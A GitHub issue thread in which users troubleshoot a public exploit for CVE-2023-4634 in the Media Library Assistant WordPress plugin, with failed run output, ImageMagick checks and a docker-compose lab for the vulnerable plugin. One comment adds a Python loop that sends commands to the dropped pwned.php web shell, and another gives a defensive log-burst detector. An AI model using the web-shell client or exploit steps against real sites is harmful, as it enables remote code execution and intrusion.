
It doesn't work ;-? #2

Open
scotch123 opened this issue Sep 10, 2023 · 13 comments

Comments

@scotch123

I only get this output:

```
[-] Checking arguments
[-] All arguments for exploiting target are set, beginning the first checks
[-] The remote FTP polyglot SVG/MSL file is reachable
[-] The remote FTP polyglot SVG/MSL file ending with [0] is reachable
[-] A sample remote FTP exploiter VID test file is reachable
[-] A sample Remote FTP exploiter VID test file ending with [0] is reachable
[-] The remote Exploit PNG/PHP file is reachable
[!] All arguments have been checked correctly, lauching exploitation
[-] Lauching 100 Threads on long SVG
[-] Waiting 5 second for the file to be created
[-] Starting Bruteforcing with VID exploiters
[-] Checking the drop of pwned.php
[!] Not yet, try 1 on 9 ... checking again in 10 seconds
[!] Not yet, try 2 on 9 ... checking again in 10 seconds
[!] Not yet, try 3 on 9 ... checking again in 10 seconds
[!] Not yet, try 4 on 9 ... checking again in 10 seconds
[!] Not yet, try 5 on 9 ... checking again in 10 seconds
[!] Not yet, try 6 on 9 ... checking again in 10 seconds
[!] Not yet, try 7 on 9 ... checking again in 10 seconds
[!] Not yet, try 8 on 9 ... checking again in 10 seconds
[!] Not yet, try 9 on 9 ... checking again in 10 seconds
[!] Exploit has not worked, try by increase concurrency value or use another method
```

Not able to reproduce it... what am I doing wrong?

@Rapid0nion

The same issue, doesn't work

@muX1337

muX1337 commented Nov 22, 2023

For me this exploit worked perfectly. Double check all the params and in my case what mostly killed this exploit are the Imagick libraries which weren't installed on the server or not the default setup.

@JsHuang

JsHuang commented Dec 13, 2023

> For me this exploit worked perfectly. Double check all the params and in my case what mostly killed this exploit are the Imagick libraries which weren't installed on the server or not the default setup.

What's the imagick default setup? I'm using the wordpress docker environment, and it always fails to read the remote explot_XX.svg (the ftp setup is right); the error log is as below:

```
_mla_die( 'Image load exception: unable to open file `/tmp/magick-fRWl3hgSjd-jy_KQdTbPr39aB2AwJMvU': No such file or directory @ error/constitute.c/ReadImage/614', '537', '404' )
```
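From a defender's side, the error quoted above is also the noisy part of this technique: the script launches 100 threads and then "bruteforces" the temporary file name, so a vulnerable site writes many `_mla_die( 'Image load exception ... /tmp/magick-...' )` records in a few seconds. The following added example (written for this thread, not part of the exploit or the plugin) parses such records from a WordPress debug.log and flags bursts of distinct `/tmp/magick-*` failures. The log lines, the `[dd-Mon-yyyy HH:MM:SS UTC]` timestamp prefix, and the 10-second / 3-event thresholds are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample WordPress debug.log lines (not from the thread). The _mla_die() message
# shape copies the error quoted above; the /tmp/magick-* names are made up.
SAMPLE_LOG = """\
[15-Dec-2023 10:00:00 UTC] PHP Notice:  Undefined index: foo in /var/www/html/wp-content/plugins/example/example.php on line 10
[15-Dec-2023 10:00:05 UTC] _mla_die( 'Image load exception: unable to open file `/tmp/magick-AAAA0000': No such file or directory @ error/constitute.c/ReadImage/614', '537', '404' )
[15-Dec-2023 10:00:05 UTC] _mla_die( 'Image load exception: unable to open file `/tmp/magick-AAAA0001': No such file or directory @ error/constitute.c/ReadImage/614', '537', '404' )
[15-Dec-2023 10:00:06 UTC] _mla_die( 'Image load exception: unable to open file `/tmp/magick-AAAA0002': No such file or directory @ error/constitute.c/ReadImage/614', '537', '404' )
[15-Dec-2023 10:00:07 UTC] _mla_die( 'Image load exception: unable to open file `/tmp/magick-AAAA0003': No such file or directory @ error/constitute.c/ReadImage/614', '537', '404' )
[15-Dec-2023 10:30:00 UTC] _mla_die( 'Image load exception: unable to open file `/tmp/magick-BBBB0000': No such file or directory @ error/constitute.c/ReadImage/614', '537', '404' )
"""

# "[timestamp] _mla_die( 'message', 'line', 'http status' )" as assumed to appear in debug.log
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s+_mla_die\(\s*'(?P<msg>.*?)',\s*'(?P<line>\d+)',\s*'(?P<status>\d+)'\s*\)"
)
TMP_RE = re.compile(r"`(/tmp/magick-[^`']+)'")


def parse_mla_die(text):
    """Return [(timestamp, tmp_path, http_status)] for every 'Image load exception' naming
    a /tmp/magick-* file; other log lines and other _mla_die() errors are skipped."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        tmp = m and TMP_RE.search(m.group("msg"))
        if not tmp or "Image load exception" not in m.group("msg"):
            continue
        # "15-Dec-2023 10:00:05 UTC": drop the zone name before parsing
        ts = datetime.strptime(m.group("ts").rsplit(" ", 1)[0], "%d-%b-%Y %H:%M:%S")
        events.append((ts, tmp.group(1), m.group("status")))
    return events


def find_bursts(events, window=timedelta(seconds=10), threshold=3):
    """Bucket events into consecutive windows; return [(window_start, count, distinct_paths)]
    for windows with at least `threshold` failures. Many distinct /tmp/magick-* names failing
    within seconds is the footprint of the 100-thread filename guessing described in this issue."""
    events = sorted(events)
    bursts, i = [], 0
    while i < len(events):
        start, j = events[i][0], i
        while j < len(events) and events[j][0] - start <= window:
            j += 1
        chunk = events[i:j]
        if len(chunk) >= threshold:
            bursts.append((start, len(chunk), len({path for _, path, _ in chunk})))
        i = j
    return bursts
```

On the sample above the single failure at 10:30 is left alone while the four failures at 10:00:05-10:00:07 are reported as one burst over four distinct temporary names.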

@N00BIER

N00BIER commented Dec 15, 2023

> > For me this exploit worked perfectly. Double check all the params and in my case what mostly killed this exploit are the Imagick libraries which weren't installed on the server or not the default setup.
>
> What's the imagick default setup? I'm using the wordpress docker environment, and it always fails to read the remote explot_XX.svg (the ftp setup is right); the error log is as below:
>
> ```
> _mla_die( 'Image load exception: unable to open file `/tmp/magick-fRWl3hgSjd-jy_KQdTbPr39aB2AwJMvU': No such file or directory @ error/constitute.c/ReadImage/614', '537', '404' )
> ```

Try `apt install imagemagick` in your docker container... that should make it work.

@N00BIER

N00BIER commented Dec 15, 2023

One thing I cannot understand, though, is why we keep trying to get pwned.php multiple times...
Another cosmetic change I would suggest is to add a reverse shell to the script, to have it in your terminal instead of using the browser, just for the sake of convenience.

```python
import re
import requests


def shell(cmd, url):
    # Send the command to the dropped pwned.php and print whatever comes back inside <pre>...</pre>
    response = requests.get(url, params={"cmd": cmd})
    match = re.search(r'<pre>(.*)</pre>', response.text, re.DOTALL)
    if not match:
        return None
    extracted_text = match.group(1).strip()
    print(extracted_text)
    return extracted_text

# .....
while True:
    cmd = input("$ ")
    shell(cmd, target_virus)  # target_virus: URL of the dropped file, set earlier in the script
```

@JsHuang

JsHuang commented Dec 15, 2023

> > > For me this exploit worked perfectly. Double check all the params and in my case what mostly killed this exploit are the Imagick libraries which weren't installed on the server or not the default setup.
> >
> > What's the imagick default setup? I'm using the wordpress docker environment, and it always fails to read the remote explot_XX.svg (the ftp setup is right); the error log is as below:
> >
> > ```
> > _mla_die( 'Image load exception: unable to open file `/tmp/magick-fRWl3hgSjd-jy_KQdTbPr39aB2AwJMvU': No such file or directory @ error/constitute.c/ReadImage/614', '537', '404' )
> > ```
>
> Try `apt install imagemagick` in your docker container... that should make it work.

After `apt install imagemagick` and restarting docker I still get the same error.

@N00BIER

N00BIER commented Dec 15, 2023

> > > > For me this exploit worked perfectly. Double check all the params and in my case what mostly killed this exploit are the Imagick libraries which weren't installed on the server or not the default setup.
> > >
> > > What's the imagick default setup? I'm using the wordpress docker environment, and it always fails to read the remote explot_XX.svg (the ftp setup is right); the error log is as below:
> > >
> > > ```
> > > _mla_die( 'Image load exception: unable to open file `/tmp/magick-fRWl3hgSjd-jy_KQdTbPr39aB2AwJMvU': No such file or directory @ error/constitute.c/ReadImage/614', '537', '404' )
> > > ```
> >
> > Try `apt install imagemagick` in your docker container... that should make it work.
>
> After `apt install imagemagick` and restarting docker I still get the same error.

It is hard to help without seeing your config... For a start, you can post your dockerfile/docker-compose and phpinfo here...

@JsHuang

JsHuang commented Dec 15, 2023

Here is the phpinfo(): PHP 8.2.13 - phpinfo().zip (attachment).
I'm using the official wordpress docker image, pulled with `docker pull wordpress:latest`.

@N00BIER

N00BIER commented Dec 15, 2023

> Here is the phpinfo(): PHP 8.2.13 - phpinfo().zip (attachment). I'm using the official wordpress docker image, pulled with `docker pull wordpress:latest`.

Also, have you checked your /tmp folder for magick-*? Do `find / -regex ".*\/tmp\/magick-.*"`.
If positive, do the following checks in your docker container:

```shell
$ php -r '$test = new Imagick("vid:msl:/tmp/magick-<first N symbols of existing file>*");'   # ---> the result should be a segmentation fault
$ composite patrowl.png text:./patrowl.txt patrowl_over.png   # ---> create your own files
```

@N00BIER

N00BIER commented Dec 15, 2023

> Here is the phpinfo(): PHP 8.2.13 - phpinfo().zip (attachment). I'm using the official wordpress docker image, pulled with `docker pull wordpress:latest`.

  1. Use this docker-compose.yaml:

```yaml
version: "3"
# Defines which compose version to use
services:
  # Services line define which Docker images to run. In this case, it will be MySQL server and WordPress image.
  db:
    image: mysql:5.7
    # image: mysql:5.7 indicates the MySQL database container image from Docker Hub used in this installation.
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: MyR00tMySQLPa$$5w0rD
      MYSQL_DATABASE: MyWordPressDatabaseName
      MYSQL_USER: MyWordPressUser
      MYSQL_PASSWORD: Pa$$5w0rD
      # Previous four lines define the main variables needed for the MySQL container to work: database, database username, database user password, and the MySQL root password.
  wordpress:
    depends_on:
      - db
    image: wordpress:6.0.1
    restart: always
    # Restart line controls the restart mode, meaning if the container stops running for any reason, it will restart the process immediately.
    ports:
      - "8000:80"
      # The previous line defines the port that the WordPress container will use. After successful installation, the full path will look like this: http://localhost:8000
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: MyWordPressUser
      WORDPRESS_DB_PASSWORD: Pa$$5w0rD
      WORDPRESS_DB_NAME: MyWordPressDatabaseName
      # Similar to MySQL image variables, the last four lines define the main variables needed for the WordPress container to work properly with the MySQL container.
    volumes:
      ["./:/var/www/html"]
volumes:
  mysql: {}
```

  2. Place the vulnerable version of the MLA plugin in wp-content/plugins (https://downloads.wordpress.org/plugin/media-library-assistant.3.07.zip).
  3. Go to your browser, install wordpress and activate the MLA plugin. Do not upgrade it!
  4. In your docker container do `apt install imagemagick`.
  5. Install Nuclei on your Kali or whatever box you are using and perform the following check: `nuclei -u http://<target IP:8000> -as` ---> you should see "CVE-2023-4634 [Critical]" or something.

@JsHuang

JsHuang commented Dec 15, 2023

> Here is the phpinfo(): PHP 8.2.13 - phpinfo().zip (attachment). I'm using the official wordpress docker image, pulled with `docker pull wordpress:latest`.

> Also, have you checked your /tmp folder for magick-*? Do `find / -regex ".*\/tmp\/magick-.*"`.
> If positive, do the following checks in your docker container:
> `$ php -r '$test = new Imagick("vid:msl:/tmp/magick-<first N symbols of existing file>*")'` ---> the result should be a segmentation fault
> `$ composite patrowl.png text:./patrowl.txt patrowl_over.png` ---> create your own files

The above steps seem fine:

```
root@2cd3cfd78452:/tmp# php -r '$test = new Imagick("vid:msl:/tmp/magick-o*");'
Segmentation fault
root@2cd3cfd78452:/tmp# composite sample.png  text:./sample.txt sample_over.png
root@2cd3cfd78452:/tmp# 
```

I'll try with your docker-compose.yaml.
The plugin version I was testing is 3.09

@N00BIER

N00BIER commented Dec 15, 2023

> > Here is the phpinfo(): PHP 8.2.13 - phpinfo().zip (attachment). I'm using the official wordpress docker image, pulled with `docker pull wordpress:latest`.
>
> > Also, have you checked your /tmp folder for magick-*? Do `find / -regex ".*\/tmp\/magick-.*"`.
> > If positive, do the following checks in your docker container:
> > `$ php -r '$test = new Imagick("vid:msl:/tmp/magick-<first N symbols of existing file>*")'` ---> the result should be a segmentation fault
> > `$ composite patrowl.png text:./patrowl.txt patrowl_over.png` ---> create your own files
>
> The above steps seem fine:
>
> ```
> root@2cd3cfd78452:/tmp# php -r '$test = new Imagick("vid:msl:/tmp/magick-o*");'
> Segmentation fault
> root@2cd3cfd78452:/tmp# composite sample.png  text:./sample.txt sample_over.png
> root@2cd3cfd78452:/tmp# 
> ```
>
> I'll try with your docker-compose.yaml. The plugin version I was testing is 3.09

Well, it seems imagick is all set... Try to use my docker-compose file and let me know if the issue still persists. In my config, imagemagick is < 7.0.0. I know that in >7.0.7 or 7.1.0 they've patched some widely exploited vulns.

@JsHuang

JsHuang commented Dec 15, 2023

Thanks @N00BIER, your docker compose file works.
